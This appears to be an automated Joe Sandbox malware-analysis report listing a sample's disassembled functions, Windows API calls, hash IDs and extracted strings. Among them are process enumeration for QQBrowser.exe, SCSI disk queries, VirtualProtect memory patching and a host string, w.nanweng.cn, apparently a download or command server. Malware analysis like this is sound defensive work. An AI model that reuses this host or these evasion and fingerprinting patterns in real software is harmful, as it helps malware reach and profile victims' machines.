                                                                                                                                                                                                          • Opcode ID: 144d4fe3b548dfb2d315c02852a20befee574216dbad169d1b1e79d1547f0957
                                                                                                                                                                                                          • Instruction ID: c03e4c8e7f3104c698af547b441a8db5b5e61d86c528da2eac5f0a599ab7c7c2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 144d4fe3b548dfb2d315c02852a20befee574216dbad169d1b1e79d1547f0957
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E19171D002589BDB25DB64CD457DEB7B8AF55304F1082EEE409B7292EB386B88CF94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040759F
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00407620
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?,?,?,?,?,?,?), ref: 0040762F
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$Affinity::operator!=Concurrency::details::EnterExistsFileHardwareInit_thread_footerInitializeLeavePathstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ion$nces$sess$star$tup_$urls
                                                                                                                                                                                                          • API String ID: 2857489092-3048481300
                                                                                                                                                                                                          • Opcode ID: d5136dc851da2c277e804589074bbde125e70991f62ccf397ad0d931ae745db1
                                                                                                                                                                                                          • Instruction ID: 52ea1bf94da476a521094806a63c5578b8c33458e04c5f20b5cbe593ff7f6378
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5136dc851da2c277e804589074bbde125e70991f62ccf397ad0d931ae745db1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09E1E271D042589BEB21DB64CD45BDEB7B8AF15304F0081EAE408B7291EB386BC8CF95
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00407B3F
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00407BC6
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 00407BD5
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$Affinity::operator!=Concurrency::details::EnterExistsFileHardwareInit_thread_footerInitializeLeavePathstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ion$renc$sess$star$tup_$urls
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,005733F8,00000000), ref: 00423228
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00423258
                                                                                                                                                                                                          • _strrchr.LIBCMT ref: 00423282
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,@1_360.exe), ref: 004232FF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0042332F
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,@1_360.exe), ref: 004233FC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • API ID: CriticalSection$AddressHandleModuleProc$EnterErrorInit_thread_footerInitializeLastLeave_strrchr
                                                                                                                                                                                                          • String ID: @1_360.exe$eA$v0001360.exe
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,00000000,EFE0703F,?,?), ref: 004046D6
                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A,?,?,?), ref: 00404776
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 00404782
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00404921
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • API ID: AddressAffinity::operator!=CloseConcurrency::details::HardwareOpenProcQueryValuestd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ion$on_s$sess$tart
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(005980A4), ref: 0046B1B1
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0046B1D0
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(005980A4), ref: 0046B1EB
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(005980A4), ref: 0046B244
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(763B0000,?), ref: 0046B261
                                                                                                                                                                                                          • CLSIDFromString.COMBASE(Shell.Explorer,?,EFE0703F,?,00000000,?,?,?,?,?,?,?,?,?,00000000,0054AFE3), ref: 0046B276
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(?,00000000,00000005,00564970,00000000), ref: 0046B291
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AddressCreateFromInit_thread_footerInitializeInstanceProcString__onexit
                                                                                                                                                                                                          • String ID: Shell.Explorer
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00483B30
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001), ref: 00483B46
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00483B6A
                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00483BA6
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00483BB9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • API ID: CriticalSection$Process32$AddressCloseCreateEnterFirstHandleInit_thread_footerInitializeLeaveNextProcSnapshotToolhelp32
                                                                                                                                                                                                          • String ID: QQBrowser.exe$Snap$shot
                                                                                                                                                                                                          • API String ID: 142191753-275083281
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000000,?,00000000), ref: 0044AACC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: /qy/png$?p$?p$P}A$js=$png$url$w.nanweng.cn
                                                                                                                                                                                                          • API String ID: 3472027048-2782442111
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0041D171
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0041D1C6
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0041D1E1
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,ThumWndClass,00000000,46000000,00000000,00000000,00000208,000000F0,?,00000000,00000000,00000000), ref: 0041D20A
                                                                                                                                                                                                          • SetRectEmpty.USER32(00000024), ref: 0041D29A
                                                                                                                                                                                                            • Part of subcall function 0046B140: RtlInitializeCriticalSection.NTDLL(005980A4), ref: 0046B1B1
                                                                                                                                                                                                            • Part of subcall function 0046B140: __Init_thread_footer.LIBCMT ref: 0046B1D0
                                                                                                                                                                                                            • Part of subcall function 0046B140: RtlEnterCriticalSection.NTDLL(005980A4), ref: 0046B1EB
                                                                                                                                                                                                            • Part of subcall function 0046B140: RtlLeaveCriticalSection.NTDLL(005980A4), ref: 0046B244
                                                                                                                                                                                                            • Part of subcall function 0046B140: GetProcAddress.KERNEL32(763B0000,?), ref: 0046B261
                                                                                                                                                                                                            • Part of subcall function 0046B140: CLSIDFromString.COMBASE(Shell.Explorer,?,EFE0703F,?,00000000,?,?,?,?,?,?,?,?,?,00000000,0054AFE3), ref: 0046B276
                                                                                                                                                                                                            • Part of subcall function 0046B140: CoCreateInstance.COMBASE(?,00000000,00000005,00564970,00000000), ref: 0046B291
                                                                                                                                                                                                            • Part of subcall function 00421B40: RtlInitializeCriticalSection.NTDLL(00597D48), ref: 00421BAE
                                                                                                                                                                                                            • Part of subcall function 00421B40: __Init_thread_footer.LIBCMT ref: 00421BCA
                                                                                                                                                                                                            • Part of subcall function 00421B40: RtlEnterCriticalSection.NTDLL(00597D48), ref: 00421BE5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$CreateEnterInit_thread_footer$AddressClassCursorEmptyFromInstanceLeaveLoadProcRectRegisterStringWindow
                                                                                                                                                                                                          • String ID: 0$ThumWndClass
                                                                                                                                                                                                          • API String ID: 489526686-2620089244
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0043B176
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlInitializeCriticalSection.NTDLL(00598018), ref: 0043BD52
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: __Init_thread_footer.LIBCMT ref: 0043BD6E
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlEnterCriticalSection.NTDLL ref: 0043BD89
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlLeaveCriticalSection.NTDLL(00598018), ref: 0043BE0F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveProc
                                                                                                                                                                                                          • String ID: A$Shel$cute$lExe$open$www.baidu.com/s?wd=%s&%s
                                                                                                                                                                                                          • API String ID: 3908199253-3770675778
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000096), ref: 0046A51B
                                                                                                                                                                                                          • PostMessageW.USER32(?,00000464,00000000,00000000), ref: 0046A54A
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000096), ref: 0046A55B
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000465,00000000,00000000), ref: 0046A577
                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0046A588
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000465,00000000,00000000), ref: 0046A596
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$ObjectSendSingleWait$PostSleep
                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                          • API String ID: 1155176049-1553575800
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00424231
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00597B1C,00000000), ref: 00424239
                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,00010000,00000040,?), ref: 0042426C
                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00424284
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00424291
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004242C8
                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 004243CE
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004243D8
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentThread$ErrorLastProtectVirtual$CompareExchangeInterlocked
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3841906899-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004861F0
                                                                                                                                                                                                          • GetFileVersionInfoSizeA.KERNELBASE(?,00000000,?,?,?,00000000,00000000,00000000), ref: 0048623C
                                                                                                                                                                                                          • GetFileVersionInfoA.KERNELBASE(?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00486273
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$FileInfoVersion$AddressEnterInit_thread_footerInitializeLeaveProcSize
                                                                                                                                                                                                          • String ID: %d.%d.%d.%d$\$eA
                                                                                                                                                                                                          • API String ID: 446412201-3353862543
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 0046A4AA
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 0046A4BB
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0046A4C2
                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?), ref: 0046A4C7
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Show$CallbackDispatcherEnableUser
                                                                                                                                                                                                          • String ID: .$progress_text_2
                                                                                                                                                                                                          • API String ID: 2643563226-2071466166
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597CD4), ref: 0041BB8F
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0041BBAB
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597CD4), ref: 0041BBC6
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597CD4), ref: 0041BC67
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: @/B$d/B
                                                                                                                                                                                                          • API String ID: 916978925-3891156361
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597CEC), ref: 0041BD0E
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0041BD2A
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597CEC), ref: 0041BD45
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597CEC), ref: 0041BD9B
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: h|Y$|Y
                                                                                                                                                                                                          • API String ID: 916978925-1160884022
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,Static,00571978,40000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 004824DD
                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 00482504
                                                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0048251A
                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0048252A
                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0048253C
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$CallbackCreateDispatchDispatcherEventUserWindow
                                                                                                                                                                                                          • String ID: Static
                                                                                                                                                                                                          • API String ID: 312368105-2272013587
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00416F73
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,00000000), ref: 00416F8E
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveOpenProc
                                                                                                                                                                                                          • String ID: RegO$W$eyEx$penK
                                                                                                                                                                                                          • API String ID: 3740573167-4071215687
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00475132
                                                                                                                                                                                                          • allocator.LIBCONCRTD ref: 0047513F
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0047514A
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 0047516E
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 0047518E
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 004751AE
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: construct$Base::Concurrency::details::ContextIdentityQueueWork$allocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1129248848-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048CEBF
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,?,EFE0703F,00000000,00000000), ref: 0048CF72
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,EFE0703F,00000000,00000000), ref: 0048CF83
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,?,EFE0703F,00000000,00000000), ref: 0048CFB5
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CreateFile$AddressEnterErrorInit_thread_footerInitializeLastLeaveProc
                                                                                                                                                                                                          • String ID: \GlobalMgr.db
                                                                                                                                                                                                          • API String ID: 2937582819-1229192486
                                                                                                                                                                                                          • Opcode ID: 7283598c3a9f5df7ff006fdca25e4c5fdcb2c7374817a5b1d7b12a5f41eb3c27
                                                                                                                                                                                                          • Instruction ID: 905591a37d6a8b43dd220e73fc9161e0434049f184543c8f5e2753b4af7db452
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7283598c3a9f5df7ff006fdca25e4c5fdcb2c7374817a5b1d7b12a5f41eb3c27
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A51A371A00219ABEB20DF64CC81FDDB7B8FB08714F10459AE659A71D1EBB46A84CF64
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048FAE0
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 0048FB7F
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0048FC35
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F17B
                                                                                                                                                                                                            • Part of subcall function 0048F110: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 0048F18A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::task_continuation_context::task_continuation_context$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                          • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                                                          • API String ID: 2060200711-2176293039
                                                                                                                                                                                                          • Opcode ID: 5b7d8f7ad94e34154c4cbcf00bd48e9a2534786f9e2be30f8342ced1859308db
                                                                                                                                                                                                          • Instruction ID: c157bf79228966d2e194857386f233021b19a9b6f4e0922547532a4889904160
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b7d8f7ad94e34154c4cbcf00bd48e9a2534786f9e2be30f8342ced1859308db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B5196B098021CAAEB30EB14DC89BDDB774AF55704F1044EAAA08B71C2E7745BC8CF59
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(005980C8), ref: 004863D2
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004863EE
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 00486409
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(005980C8), ref: 0048645C
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
